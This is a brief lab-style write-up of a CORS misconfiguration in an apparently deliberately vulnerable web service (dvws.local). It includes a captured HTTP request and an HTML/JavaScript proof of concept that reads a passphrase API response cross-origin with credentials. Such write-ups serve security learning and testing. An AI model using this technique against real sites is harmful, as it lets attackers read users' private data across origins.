Cross Origin Resource Sharing Misonfiguration

Introduction

Cross-origin resource sharing (CORS) is a browser mechanism which enables controlled access to resources located outside of a given domain. It extends and adds flexibility to the same-origin policy (SOP). However, it also provides potential for cross-domain based attacks, if a website's CORS policy is poorly configured and implemented. CORS is not a protection against cross-origin attacks such as cross-site request forgery (CSRF).

Details

The request sent to the passphrase API call requires no credentials. This could be leveraged by an attacker to steal a user's credentials.

GET /api/v2/passphrase/test HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://dvws.local/passphrasegen.html

Proof Of Concept

<html>
<body>
<script>


function cors() {  
var xhttp = new XMLHttpRequest();  
xhttp.onreadystatechange = function() {    
    if (this.status == 200) {    
    alert(this.responseText);     
    document.getElementById("demo").innerHTML = this.responseText;    
    }  
};  
xhttp.open("GET", "http://dvws.local/api/v2/passphrase/test", true);  
xhttp.withCredentials = true;  
xhttp.send();
}
cors();

</script>
</body>
</html>

References

• https://book.hacktricks.xyz/pentesting-web/cors-bypass
• https://we45.com/blog/3-ways-to-exploit-misconfigured-cross-origin-resource-sharing-cors/
• https://www.packetlabs.net/cross-origin-resource-sharing-cors/